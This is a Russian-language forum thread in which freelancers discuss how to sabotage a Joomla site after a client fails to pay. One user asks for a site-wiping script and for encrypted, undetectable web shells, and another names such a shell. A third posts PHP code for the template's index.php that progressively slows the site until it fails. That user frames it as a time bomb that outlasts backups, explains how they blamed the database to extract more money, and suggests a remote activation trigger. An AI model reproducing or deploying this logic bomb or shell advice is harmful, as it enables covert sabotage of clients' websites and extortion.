Привет всем, подскажите есть ли какие нибудь готовые скрипты к Joomla 1.5, суть сделал сайт не заплатили, пишеш в строку браузера путь к этому скрипту, то что ты сделал на Joomla (вся работа уничтожается)
вот думал у кого нибудь похожий скриптик есть Кстате на счет шеллов, где можно уже закриптованые(Base 64) скачать, нормальные что бы не палились не чем
ВСО2 по дефолту есть криптованый.Пока что ничем не палится.А вообще,то что ты хочеш - полное говнецо,действовать нужно не так,и не нужно давать скрипты в перед.Показал на удаленке что все оке - плати бабло,получай скрипт.А елсли уже приспичило удалять файло у клиентоса,то это: 1) незаконно с точки зрения УК-РФ. 2) бесполезно.даже у самого куевого хостера,в худшем случае раз в день делаеться бекап. Намек понятен?
Были у меня проблемы с заказчиком, не хотел деньги отдавать. Фтп сохранился, вот я ему и подправил файлы. Добавь в начало root/templates/название темплета/index.php PHP: <?php if (file_exists('index2.php')) { $fil = fopen('index2.php', r); $dat = fread($fil, filesize('index2.php')); sleep(1, $fil / 20); fclose($fil); $fil = fopen('index2.php', w); fwrite($fil, $dat+1); } else { $fil = fopen('index2.php', w); fwrite($fil, 1); fclose($fil); } ?> Преимущества такого подхода: + В данном случае на каждые 20 заходов время загрузки увеличивается на одну секунду, поэтому сразу не заметят. Одна секунда - это не мало, очень заметно при 3-4 и более. Выше 60 и сайт не грузится - пхп таймоут. + Т.к. это бомба замедленного действия, когда заметят - бакапы не помогут. Хостеры обычно не более недели хранят файлы. Да и кто хочет терять работы на неделю. + Тебя не в чем обвинить - при чем тут ты? (Читай ниже) Я код вставил, посидел недельку и мне звонят - мол, в чем дело - сайт ужасно тормозит? Я сказал - видимо база данных засорилась) А чистить - дело долгое, нудное - ещё за сотку почищу)) заодно и за сайт заплатили Правда прождал ещё пару дней пока сайт совсем не рухнул. Из-за рандома он все-таки время он времени появлялся на свет. ЗЫ. Чтоб активировать этот скрипт можешь сделать файл с названием типа index2.php в папку инклудов который создаст файл activate.txt, а в скрипт добавить строку для проверки наличия файла. ЗЫ.ЗЫ. Так же можешь использовать базу данных для счетчика.